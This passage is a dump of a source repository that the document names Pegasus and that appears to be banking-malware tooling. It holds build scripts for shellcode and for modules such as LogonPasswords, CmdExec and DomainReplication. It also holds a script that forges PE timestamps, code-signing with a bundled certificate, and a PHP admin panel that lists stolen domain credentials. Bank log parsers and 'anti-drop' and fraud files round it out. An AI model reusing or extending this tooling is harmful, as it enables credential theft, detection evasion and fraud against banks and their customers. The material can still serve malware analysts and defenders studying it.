filesize($fname_orig); 31 | if (!$len_orig) { die("ERR: unable to query original file {$fname_orig}"); } */ 32 | 33 | // resulting string 34 | $s = ''; 35 | 36 | $s = "/* 37 | ".basename($g_Filename_out)." 38 | file2bin converted, sha1 ".sha1($bin)." 39 | */ 40 | 41 | #define bin_{$name}_len_orig {$len_orig} 42 | #define bin_{$name}_len {$len} 43 | 44 | BYTE bin_{$name}[{$len}] = {"; 45 | 46 | // convert bin 2 hex 47 | $hex = unpack('H*', $bin); $hex_arr = str_split($hex[1], 2); //print_r($hex_arr); 48 | 49 | $counter = 1; 50 | foreach ($hex_arr as $val) { 51 | $s .= "0x{$val},"; 52 | $counter++; 53 | if ($counter >20 ) { $s .="\r\n"; $counter = 1; } 54 | } 55 | 56 | // cut last comma 57 | $s = substr($s, 0, -1); 58 | 59 | $s .= "};"; 60 | 61 | // save resulting dat 62 | file_put_contents($g_Filename_out, $s); 63 | 64 | //echo "\ndone"; 65 | 66 | 67 | 68 | ?> -------------------------------------------------------------------------------- /Pegasus/tools/core_build.log: -------------------------------------------------------------------------------- 1 | Core buildlog, mode RELEASE 2 | Rebuilding RELEASE shellcode x32 3 | 4 | Microsoft Visual Studio 2013 Version 12.0.31101.0. 5 | Copyright (C) Microsoft Corp. All rights reserved. 6 | 1>------ Rebuild All started: Project: shellcode, Configuration: Release Win32 ------ 7 | 1> This tool executes recrypt_strings.php script 8 | 1> Expected params: 9 | 1> param1 - main source file ("Z:\Sources\Pegasus\Shellcode\shellcode.c") 10 | 1> :: shellcode.c 11 | 1> :: PELoader.cpp 12 | 1> :: dbg.c 13 | 1> :: dbg.h 14 | 1> :: PELoader.h 15 | 1> :: HashedStrings.c 16 | 1> :: HashedStrings.h 17 | 1> :: shellcode.h 18 | 1> :: dbgt.h 19 | 1> HashedStrings.c 20 | 1> PELoader.cpp 21 | 1> SHELLCODE mode 22 | 1> shellcode.c 23 | 1> Generating code 24 | 1> Finished generating code 25 | 1> Shellcode.vcxproj -> Z:\Sources\Pegasus\binres\shellcode.x32 26 | ========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ========== 27 | Rebuilding RELEASE shellcode x64 28 | -------------------------------------------------------------------------------- /Pegasus/tools/fake_timestamps.php: -------------------------------------------------------------------------------- 1 | to process"); } 12 | 13 | $fname = $argv[1]; 14 | if (!file_exists($fname)) { die("ERR: file {$fname} does not exists"); } 15 | 16 | $pe_data = file_get_contents($fname); 17 | 18 | $res = array(); 19 | 20 | // IMAGE_DOS_HEADER 21 | $res['IMAGE_DOS_HEADER'] = unpack('ve_magic/ve_cblp/ve_cp/ve_crlc/ve_cparhdr/ve_minalloc/ve_maxalloc/ve_ss/ve_sp/ve_csum/ve_ip/ve_cs/ve_lfarlc/ve_ovno/v4e_res/ve_oemid/ve_oeminfo/v10e_res2/ve_lfanew', $pe_data); 22 | if ($res['IMAGE_DOS_HEADER']['e_magic'] != 0x05a4d) { die("Invalid DOS header signature"); } 23 | 24 | // arch-independent part of IMAGE_NT_HEADERS : Signature + IMAGE_FILE_HEADER 25 | $res['IMAGE_FILE_HEADER'] = unpack('VSignature/vMachine/vNumberOfSections/VTimeDateStamp/VPointerToSymbolTable/VNumberOfSymbols/vSizeOfOptionalHeader/vCharacteristics', substr($pe_data, $res['IMAGE_DOS_HEADER']['e_lfanew'])); 26 | if ($res['IMAGE_FILE_HEADER']['Signature'] != 0x4550) { die("Invalid PE header signature"); } 27 | 28 | // modify timestamp with random val 29 | $new_ts = mt_rand( strtotime("01 January 2014"), strtotime("01 June 2015") ); // gen rnd PE timestamp 30 | $pe_data = substr_replace( $pe_data, pack("V", $new_ts), $res['IMAGE_DOS_HEADER']['e_lfanew'] + (2 * 4), 4); 31 | 32 | // save result 33 | file_put_contents($fname, $pe_data); 34 | 35 | echo "OK: {$fname} ts ".date('d-M-Y H:i:s', $res['IMAGE_FILE_HEADER']['TimeDateStamp'])." -> ".date('d-M-Y H:i:s', $new_ts)."\n"; 36 | 37 | 38 | 39 | ?> -------------------------------------------------------------------------------- /Pegasus/tools/postbuild_installer.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem postbuild_installer.bat 3 | rem Checks output exe, cleans some build timestamp fields, etc 4 | rem FOR MAIN INSTALLER EXE 5 | 6 | echo Calling script [%0] for target [%1] 7 | 8 | rem check if param passed 9 | if not exist %1 ( 10 | echo ERR: target file not found 11 | exit 255 12 | ) 13 | 14 | echo Post-parsing target 15 | pushd 16 | cd /d %~dp0 17 | php -n -f fake_timestamps.php %1 18 | popd 19 | if NOT ERRORLEVEL 0 ( 20 | echo ERR: fake_timestamps.php parse failure 21 | exit 255 22 | ) 23 | 24 | echo Signing binary 25 | signtool.exe sign /f tric.pfx /p 123 %1 26 | if NOT ERRORLEVEL 0 ( 27 | echo ERR: Sign failed 28 | exit 255 29 | ) 30 | 31 | 32 | rem got here if all was ok 33 | echo ----------------------- Postbuils script finished OK -------------------------- 34 | echo . 35 | exit 0 36 | 37 | @echo off -------------------------------------------------------------------------------- /Pegasus/tools/prebuild_installer.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem prebuild_installer.bat
3 | rem Recrypt strings, regenerates resources 4 | 5 | echo Calling script [%0] with param [%1] in mode [%2] 6 | 7 | rem check if param passed 8 | if not exist %1 ( 9 | echo ERR: main source file not found 10 | exit 255 11 | ) 12 | 13 | echo Calling macro parser/string encryption 14 | rem goto script dir so php won't claim No input file specified 15 | pushd 16 | cd /d %~dp0 17 | php -n -f recrypt_strings.php %1 18 | popd 19 | 20 | echo Preparing binpack resources 21 | pushd 22 | cd /d %~dp0 23 | php -n -f make_binpack.php %2 24 | popd 25 | if not exist ..\inc\binpack.h ( 26 | echo ERR: binpack not generated 27 | exit 255 28 | ) 29 | 30 | rem got here if all was ok 31 | echo ----------------------- Prebuild script finished OK -------------------------- 32 | echo . 33 | exit 0 -------------------------------------------------------------------------------- /Pegasus/tools/rebuild_core.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cls 3 | rem rebuild_core.bat 4 | rem Performs rebuild of all core projects - shellcode, rse, idd, wdd, possibly some others later 5 | rem essential for building binpack and resulting installer exe 6 | rem NOTE: second essential part before preparing binpack is building all the modules needed into ./binres/ dir 7 | 8 | 9 | echo Setuping VS2012 vars 10 | call "%VS120COMNTOOLS%\vsvars32.bat" 11 | 12 | 13 | goto build_%1 14 | :build_ 15 | echo ERR: no param passed, expected 16 | exit 255 17 | 18 | 19 | :build_Release 20 | :build_Debug 21 | 22 | rem Wipe some temp files 23 | rem del ..\binres\*.pdb 24 | 25 | echo Core buildlog, mode %1 > core_build.log 26 | 27 | echo Building CORE in %1 mode 28 | 29 | call rebuild_project.bat %1 shellcode x32 core_build.log shellcode 30 | call rebuild_project.bat %1 shellcode x64 core_build.log shellcode 31 | 32 | call rebuild_project.bat %1 RemoteServiceExe x32 core_build.log rse 33 | call rebuild_project.bat %1 RemoteServiceExe x64 core_build.log rse 34 | 35 | call rebuild_project.bat %1 InstallDispatcherDll x32 core_build.log idd 36 | call rebuild_project.bat %1 InstallDispatcherDll x64 core_build.log idd 37 | 38 | call rebuild_project.bat %1 WorkDispatcherDll x32 core_build.log wdd 39 | call rebuild_project.bat %1 WorkDispatcherDll x64 core_build.log wdd 40 | 41 | rem Revore read only from all files 42 | attrib -R "..\binres\*.x32" 43 | attrib -R "..\binres\*.x64" -------------------------------------------------------------------------------- /Pegasus/tools/rebuild_modules.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cls 3 | rem rebuild_modules.bat 4 | rem Performs rebuild of actual modules 5 | 6 | 7 | echo Setuping VS2012 vars 8 | call "%VS120COMNTOOLS%\vsvars32.bat" 9 | 10 | 11 | goto build_%1 12 | :build_ 13 | echo ERR: no param passed, expected 14 | exit 255 15 | 16 | 17 | :build_Release 18 | :build_Debug 19 | 20 | echo Modules buildlog, mode %1 > mods_build.log 21 | 22 | echo Building MODULES in %1 mode 23 | 24 | 25 | 26 | call rebuild_project.bat %1 mod_CmdExec x32 mods_build.log mod_CmdExec 27 | call rebuild_project.bat %1 mod_CmdExec x64 mods_build.log mod_CmdExec 28 | 29 | call rebuild_project.bat %1 mod_DomainReplication x32 mods_build.log mod_DomainReplication 30 | call rebuild_project.bat %1 mod_DomainReplication x64 mods_build.log mod_DomainReplication 31 | 32 | call rebuild_project.bat %1 mod_LogonPasswords x32 mods_build.log mod_LogonPasswords 33 | call rebuild_project.bat %1 mod_LogonPasswords x64 mods_build.log mod_LogonPasswords 34 | 35 | call rebuild_project.bat %1 mod_NetworkConnectivity x32 mods_build.log mod_NetworkConnectivity 36 | call rebuild_project.bat %1 mod_NetworkConnectivity x64 mods_build.log mod_NetworkConnectivity 37 | 38 | rem Revore read only from all files 39 | attrib -R "..\binres\*.x32" 40 | attrib -R "..\binres\*.x64" 41 | -------------------------------------------------------------------------------- /Pegasus/tools/rebuild_project.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem rebuild_project.bat 1 2 3 4 5 3 | rem rebuilds a single project when all vars are set 4 | 5 | 6 | if exist "..\binres\*.pdb" ( 7 | del "..\binres\*.pdb" > nul 8 | ) 9 | if exist "..\binres\*.lib" ( 10 | del "..\binres\*.lib" > nul 11 | ) 12 | if exist "..\binres\*.exp" ( 13 | del "..\binres\*.exp" > nul 14 | ) 15 | if exist "..\binres\*.bsc" ( 16 | del "..\binres\*.bsc" > nul 17 | ) 18 | 19 | 20 | if exist "..\binres\%5.%3" ( 21 | attrib -R "..\binres\%5.%3" 22 | del "..\binres\%5.%3" > nul 23 | ) 24 | 25 | echo Rebuilding %1 %2 %3 26 | echo Rebuilding %1 %2 %3 >> %4 27 | devenv ..\Pegasus.sln /Rebuild "%1|%3" /project %2 >> %4 28 | 29 | rem Check build result 30 | if %ERRORLEVEL% NEQ 0 ( 31 | echo ERROR rebuilding %2 in mode %1 %3 32 | pause 33 | exit 255 34 | ) 35 | 36 | rem Extra check for output file exists 37 | if not exist "..\binres\%5.%3" ( 38 | echo ERROR: output file %5.%3 not found 39 | pause 40 | exit 254 41 | ) 42 | 43 | if exist "..\binres\*.pdb" ( 44 | del "..\binres\*.pdb" > nul 45 | ) 46 | if exist "..\binres\*.lib" ( 47 | del "..\binres\*.lib" > nul 48 | ) 49 | if exist "..\binres\*.exp" ( 50 | del "..\binres\*.exp" > nul 51 | ) 52 | if exist "..\binres\*.bsc" ( 53 | del "..\binres\*.bsc" > nul 54 | ) 55 | 56 | rem Resolving build issue when new target may remove previous binary file 57 | attrib +R "..\binres\%5.%3" 58 | -------------------------------------------------------------------------------- /Pegasus/tools/recrypt_strings.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo This tool executes recrypt_strings.php script 3 | echo Expected params: 4 | echo param1 - main source file (%1) 5 | 6 | if not exist %1 ( 7 | echo ERR: source not found 8 | exit 255 9 | ) 10 | 11 | rem set 12 | 13 | rem goto script dir so php won't claim No input file specified 14 | cd /d %~dp0 15 | php -n -f recrypt_strings.php %1 16 | -------------------------------------------------------------------------------- /Pegasus/tools/signtool.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/tools/signtool.exe -------------------------------------------------------------------------------- /Pegasus/web-adminpart/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteOptions inherit 3 | RewriteRule ^(.*)$ index.php [L] -------------------------------------------------------------------------------- /Pegasus/web-adminpart/cfg/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/cfg/config.php: -------------------------------------------------------------------------------- 1 | 'localhost', 8 | 'db' => 'pegasus', 9 | 'user' => 'root', 10 | 'password' => '12345' 11 | ); 12 | 13 | // testpass 14 | $g_auth_data = array( 15 | 'user' => 'root', 16 | 'pass' => 'testpass' 17 | ); 18 | 19 | // ips to exclude from geo2ip queries 20 | $g_exclude_ips = array( 21 | '127.0.0.1', 22 | '127.0.0.1' 23 | ); 24 | 25 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/inc_ajax.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_ajax_mcreds.php: -------------------------------------------------------------------------------- 1 | FROM_UNIXTIME({$ts})"; } 21 | $sql = "SELECT `id`, 22 | `src_id`, 23 | DATE_FORMAT(`stamp`, '%d/%m %H:%i') AS `stamp`, 24 | (UNIX_TIMESTAMP(NOW()) - UNIX_TIMESTAMP(`stamp`)) AS `ts_ago`, 25 | UNIX_TIMESTAMP(`stamp`) AS `ts`, 26 | `SM`, 27 | `D`, 28 | `U`, 29 | `P` 30 | FROM `creds` {$sql_extra} ORDER BY `stamp` DESC"; 31 | 32 | // issue query 33 | if (!($res = mysqli_query($g_dblink, $sql))) { errExit("db query error: ".mysqli_error($g_dblink)); } 34 | 35 | $answer['r'] = array(); 36 | $answer['ts'] = 0; 37 | 38 | while ($row = mysqli_fetch_assoc($res)) { 39 | 40 | // set some fields 41 | $row['cred'] = $row['D']."\\".$row['U'].":".$row['P']; unset($row['D']); unset($row['U']); unset($row['P']); 42 | 43 | $row['ts_ago'] = ticks2string($row['ts_ago']*100, TRUE); 44 | 45 | $answer['r'][] = $row; 46 | if ($row['ts'] > $answer['ts']) { $answer['ts'] = $row['ts']; } 47 | unset($row); 48 | } // while 49 | 50 | $answer['c'] = count($answer['r']); 51 | 52 | // all modules count assign 53 | $answer['mc'] = mCountsQuery(); 54 | 55 | echo json_encode($answer); 56 | exit; 57 | } 58 | 59 | 60 | 61 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_ajax_msqlog.php: -------------------------------------------------------------------------------- 1 | FROM_UNIXTIME({$ts})"; } 35 | $sql = "SELECT `id`, 36 | DATE_FORMAT(`stamp`, '%d/%m %H:%i') AS `stamp`, 37 | (UNIX_TIMESTAMP(NOW()) - UNIX_TIMESTAMP(`stamp`)) AS `ts_ago`, 38 | UNIX_TIMESTAMP(`stamp`) AS `ts`, 39 | `log_json` 40 | FROM `q_log` {$sql_extra} ORDER BY `id` DESC"; 41 | 42 | // issue query 43 | if (!($res = mysqli_query($g_dblink, $sql))) { errExit("db query error: ".mysqli_error($g_dblink)); } 44 | 45 | $answer['r'] = array(); 46 | $answer['ts'] = 0; 47 | 48 | while ($row = mysqli_fetch_assoc($res)) { 49 | 50 | $row['log'] = json_decode($row['log_json']); unset($row['log_json']); 51 | $row['ts_ago'] = ticks2string($row['ts_ago']*100, TRUE); 52 | 53 | $answer['r'][] = $row; 54 | if ($row['ts'] > $answer['ts']) { $answer['ts'] = $row['ts']; } 55 | unset($row); 56 | } // while 57 | 58 | $answer['c'] = count($answer['r']); 59 | 60 | 61 | // all modules count assign 62 | $answer['mc'] = mCountsQuery(); 63 | 64 | echo json_encode($answer); 65 | exit; 66 | } 67 | 68 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_auth.php: -------------------------------------------------------------------------------- 1 | 1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1); 24 | $data = array(); 25 | $keys = implode('|', array_keys($needed_parts)); 26 | 27 | preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER); 28 | 29 | foreach ($matches as $m) { 30 | $data[$m[1]] = $m[3] ? $m[3] : $m[4]; 31 | unset($needed_parts[$m[1]]); 32 | } 33 | 34 | return $needed_parts ? false : $data; 35 | } 36 | 37 | 38 | 39 | function lgDoCheckAuth() 40 | { global $g_auth_data; 41 | 42 | $realm = 'Restricted area'; 43 | 44 | // set auth 45 | if ( (!@isset($g_auth_data['user'])) || (!@isset($g_auth_data['pass'])) ) { die("check auth config"); } 46 | 47 | // set check 48 | if (empty($_SERVER['PHP_AUTH_DIGEST'])) { DigestAuthForm($realm); } 49 | if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST']))) { DigestAuthForm($realm); } 50 | 51 | // generate valid response 52 | $A1 = md5($g_auth_data['user'] . ':' . $realm . ':' . $g_auth_data['pass']); 53 | $A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']); 54 | $valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2); 55 | 56 | if ($data['response'] != $valid_response) { DigestAuthForm($realm); } 57 | 58 | 59 | } 60 | 61 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_db.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/inc/mod_router.php: -------------------------------------------------------------------------------- 1 | 'text/html', 25 | 'js' => 'text/javascript' 26 | 27 | ); 28 | header('Content-type: '.$types[$rContext['extension']].'; charset=utf-8'); 29 | 30 | echo file_get_contents($res); 31 | 32 | } 33 | 34 | 35 | 36 | function rrRouteScript($rContext) 37 | { 38 | 39 | $res = './inc/inc_'.$rContext['filename'].'.php'; 40 | if (!file_exists($res)) { rrNotFound(); exit; } 41 | 42 | // force refresh 43 | header('Content-type: text/html; charset=utf-8'); header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' ); 44 | header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' ); 45 | header( 'Cache-Control: no-store, no-cache, must-revalidate' ); 46 | header( 'Cache-Control: post-check=0, pre-check=0', false ); 47 | header( 'Pragma: no-cache' ); 48 | 49 | require_once $res; 50 | 51 | } 52 | 53 | 54 | 55 | /* 56 | Parses input from rewrite engine and loads/returns correct resource 57 | */ 58 | function rrDoRoute() 59 | { // $_SERVER['REQUEST_URI'] => '/pegasus-admin/index.js?sfdfd=ddd' 60 | // $urlparts => Array ( [path] => /pegasus-admin/index.js [query] => sfdfd=ddd ) 61 | $urlparts = parse_url($_SERVER['REQUEST_URI']); 62 | 63 | // $fileparts => Array ( [dirname] => /pegasus-admin [basename] => index.js [extension] => js [filename] => index ) 64 | $fileparts = pathinfo($urlparts['path']); 65 | 66 | // form context 67 | $rContext = $fileparts; 68 | $rContext['query'] = $urlparts['query']; 69 | 70 | //print_r($rContext); 71 | 72 | // fishy params check 73 | if (strpos($rContext['basename'], '..')) { die("fish"); } 74 | 75 | // check for non-php 76 | if ($rContext['extension'] != 'php') { rrRouteResource($rContext); } else { rrRouteScript($rContext); } 77 | 78 | 79 | } 80 | 81 | ?> -------------------------------------------------------------------------------- /Pegasus/web-adminpart/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Order allow,deny 3 | Deny from all 4 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/my.css: -------------------------------------------------------------------------------- 1 | 2 | label, input { display:block; } 3 | input.text { margin-bottom:12px; width:95%; padding: .4em; } 4 | fieldset { padding:0; border:0; margin-top:5px; } 5 | 6 | pre { font-family: Lucida Console,Lucida Sans Typewriter,monaco,Bitstream Vera Sans Mono,monospace; font-size: 11px; line-height: 10px; } 7 | 8 | -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/pnotify.custom.min.css: -------------------------------------------------------------------------------- 1 | .ui-pnotify{top:25px;right:25px;position:absolute;height:auto;z-index:9999}html>body>.ui-pnotify{position:fixed}.ui-pnotify .ui-pnotify-shadow{-webkit-box-shadow:0 2px 10px rgba(50,50,50,.5);-moz-box-shadow:0 2px 10px rgba(50,50,50,.5);box-shadow:0 2px 10px rgba(50,50,50,.5)}.ui-pnotify-container{background-position:0 0;padding:.8em;height:100%;margin:0}.ui-pnotify-sharp{-webkit-border-radius:0;-moz-border-radius:0;border-radius:0}.ui-pnotify-title{display:block;margin-bottom:.4em;margin-top:0}.ui-pnotify-text{display:block}.ui-pnotify-icon,.ui-pnotify-icon span{display:block;float:left;margin-right:.2em}.ui-pnotify.stack-bottomleft,.ui-pnotify.stack-topleft{left:25px;right:auto}.ui-pnotify.stack-bottomleft,.ui-pnotify.stack-bottomright{bottom:25px;top:auto}.ui-pnotify-closer,.ui-pnotify-sticker{float:right;margin-left:.2em} -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_diagonals-thick_18_b81900_40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_diagonals-thick_18_b81900_40x40.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_diagonals-thick_20_666666_40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_diagonals-thick_20_666666_40x40.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_flat_10_000000_40x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_flat_10_000000_40x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_glass_100_f6f6f6_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_100_f6f6f6_1x400.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_glass_100_fdf5ce_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_100_fdf5ce_1x400.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_glass_65_ffffff_1x400.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_glass_65_ffffff_1x400.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_gloss-wave_35_f6a828_500x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_gloss-wave_35_f6a828_500x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_highlight-soft_100_eeeeee_1x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_highlight-soft_100_eeeeee_1x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-bg_highlight-soft_75_ffe45c_1x100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-bg_highlight-soft_75_ffe45c_1x100.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_222222_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_222222_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_228ef1_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_228ef1_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ef8c08_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ef8c08_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ffd27a_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ffd27a_256x240.png -------------------------------------------------------------------------------- /Pegasus/web-adminpart/res/ui-icons_ffffff_256x240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/web-adminpart/res/ui-icons_ffffff_256x240.png -------------------------------------------------------------------------------- /bck_check/check.php: -------------------------------------------------------------------------------- 1 | ".fmt(GetVal($data, 'OutBal'))."
"; 56 | 57 | if ($context[GetVal($data, 'LastMovetDate')]['min'] == 0) { $context[GetVal($data, 'LastMovetDate')]['min'] = GetVal($data, 'EnterBal'); } 58 | if ($context[GetVal($data, 'LastMovetDate')]['max'] == 0) { $context[GetVal($data, 'LastMovetDate')]['max'] = GetVal($data, 'EnterBal'); } 59 | 60 | $context[GetVal($data, 'LastMovetDate')]['min'] = min($context[GetVal($data, 'LastMovetDate')]['min'], GetVal($data, 'EnterBal'), GetVal($data, 'OutBal')); 61 | $context[GetVal($data, 'LastMovetDate')]['max'] = max($context[GetVal($data, 'LastMovetDate')]['max'], GetVal($data, 'EnterBal'), GetVal($data, 'OutBal')); 62 | 63 | } 64 | 65 | 66 | 67 | // free mem 68 | unset($data); 69 | } 70 | 71 | 72 | 73 | /* 74 | Parses a single zip file - extracts files 75 | and send it to other parsers 76 | */ 77 | function ParseZip($fname, &$context) 78 | { 79 | // enum all files in that zip 80 | $zip = new ZipArchive; 81 | //open the archive 82 | if ($zip->open($fname) === TRUE) { 83 | //iterate the archive files array and display the filename or each one 84 | for ($i = 0; $i < $zip->numFiles; $i++) { 85 | 86 | // echo $zip->getNameIndex($i) . '
'; 87 | 88 | // read file contents into memory 89 | $fp = $zip->getStream($zip->getNameIndex($i)); 90 | 91 | // parse contents by file pointer 92 | if ($fp) { ParseFileContentsByFP($fp, $context); fclose($fp); } 93 | 94 | } // for files inside 95 | } else { 96 | echo "Failed to open {$fname}"; 97 | } 98 | 99 | $zip->close(); 100 | 101 | } 102 | 103 | set_time_limit(600); 104 | 105 | // results array context 106 | $context = array(); 107 | 108 | foreach (glob("./bck_logs/*/*.zip") as $fname) { 109 | //echo "{$fname}
"; 110 | ParseZip($fname, $context); 111 | // die(); 112 | } 113 | 114 | 115 | echo "
"; 116 | foreach ($context as $key => $val) { 117 | echo $key." -> ".fmt($val['min'])." - ".fmt($val['max'])."
"; 118 | 119 | } 120 | 121 | 122 | ?> -------------------------------------------------------------------------------- /cvs_banks/asv.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/asv.csv -------------------------------------------------------------------------------- /cvs_banks/fraud_basics.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/fraud_basics.txt -------------------------------------------------------------------------------- /cvs_banks/one.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/one.txt -------------------------------------------------------------------------------- /cvs_banks/plb.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/plb.csv -------------------------------------------------------------------------------- /cvs_banks/АНТИФРАУД.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/АНТИФРАУД.txt -------------------------------------------------------------------------------- /cvs_banks/Антидропы (485) 24 08 2015.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Антидропы (485) 24 08 2015.xls -------------------------------------------------------------------------------- /cvs_banks/Антидропы (500) 30 06 2015.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Антидропы (500) 30 06 2015.xls -------------------------------------------------------------------------------- /cvs_banks/Нипбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Нипбанк.csv -------------------------------------------------------------------------------- /cvs_banks/СБ Липецк на 17.11.2015.doc: -------------------------------------------------------------------------------- 